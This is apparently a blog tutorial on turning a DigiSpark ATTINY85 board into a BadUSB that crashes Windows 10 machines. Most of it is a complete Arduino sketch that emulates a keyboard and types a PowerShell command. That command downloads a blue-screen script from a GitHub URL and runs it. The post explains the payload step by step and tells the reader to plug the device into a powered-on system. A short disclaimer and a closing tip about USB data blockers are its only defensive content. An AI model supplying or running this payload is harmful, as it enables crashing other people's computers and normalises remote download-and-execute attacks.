Crashing Windows 10 systems using BadUSB

Disclaimer

This article has been provided solely for educational reasons, and the author is not responsible for any harm done to other computer systems through the malicious usage of this information.

What is BadUSB?

BadUSB refers to USB devices running reprogrammed firmware that allows them to act as a human interface device (HID). An example of an HID includes keyboards and mice. This means that it can perform the same tasks, emulating the same functionality of a computer mouse or sending keystrokes the same way a keyboard would. Using this ability, BadUSB devices have the potential to perform malicious activity on the target machine. Today, we are going to look at how one can create a BadUSB and use it to crash Windows 10 systems.

Image for post
Source: Wirth Consulting

Requirements

First, you must obtain a DigiSpark ATTINY85. These USB development boards are fairly cheap. If you’re willing to wait a long time for the delivery, you can order a board from China for only a few dollars off of websites like eBay.

Image for post
Source: AliExpress

Once you have your DigiSpark ATTINY85, install Arduino and follow these instructions for how to prepare your IDE so you can upload code to your board. This code will be ran as soon as the USB device gets plugged into the machine and registered as an HID.

Setup

Now that you have your DigiSpark board and your Arduino IDE ready to upload code, it is time to make Windows 10 systems encounter the Blue Screen of Death (BSOD), effectively crashing the system and forcing a reboot. Go ahead and upload this BadBSOD Arduino sketch from my Gitlab:

#include "DigiKeyboard.h"

void setup() {
}

void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for (;;) { // We are done, flash the LED forever
digitalWrite(1, HIGH);
delay(300);
digitalWrite(1, LOW);
delay(300);
}
}

Let’s go over what is happening in the BadBSOD code. First, a keystroke with the dummy value of 0 is sent. While generally not necessary, omitting it may cause the first character after a delay to not be received properly. Next, we wait 500 ms for that to take effect. After this, keystrokes KEY_R and MOD_GUI_LEFT are sent in combination. This is the same as pressing the Windows key and the letter R at the same time, bringing up the “RUN” box where commands can be run. After waiting again for the system to process our keystrokes, a payload is sent via PowerShell. This payload will download a standalone PowerShell script (found here) that raises a hard error on Windows 10 and causes the BSOD. All of this is done without requiring any administrative privileges, and it’s unlikely to be patched since it’s simply an undocumented feature. To finish off, we send the Enter keystroke which executes the command, and flash the LED on the DigiSpark board to indicate that the code has finished executing.

Results

Now that you have your DigiSpark USB board running the BadBSOD sketch, simply plug it into a Windows 10 system that’s powered on and watch it do its job!

Image for post
Source: Windows Latest

You should see the “RUN” dialog box open, followed by input being entered from seemingly nowhere. After a brief pause, the system will come to a halt with the dreaded Blue Screen of Death error. You may be wondering if anything can be done to protect yourself or others from a BadUSB attack. Obviously, you should not plug just any USB device into your computer. However, another solution involves USB condoms. A USB condom will prevent any data transfer from happening over a USB port. This is very useful whether it to be to protect yourself from BadUSB attacks, juice jacking, or more!

Junior software developer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store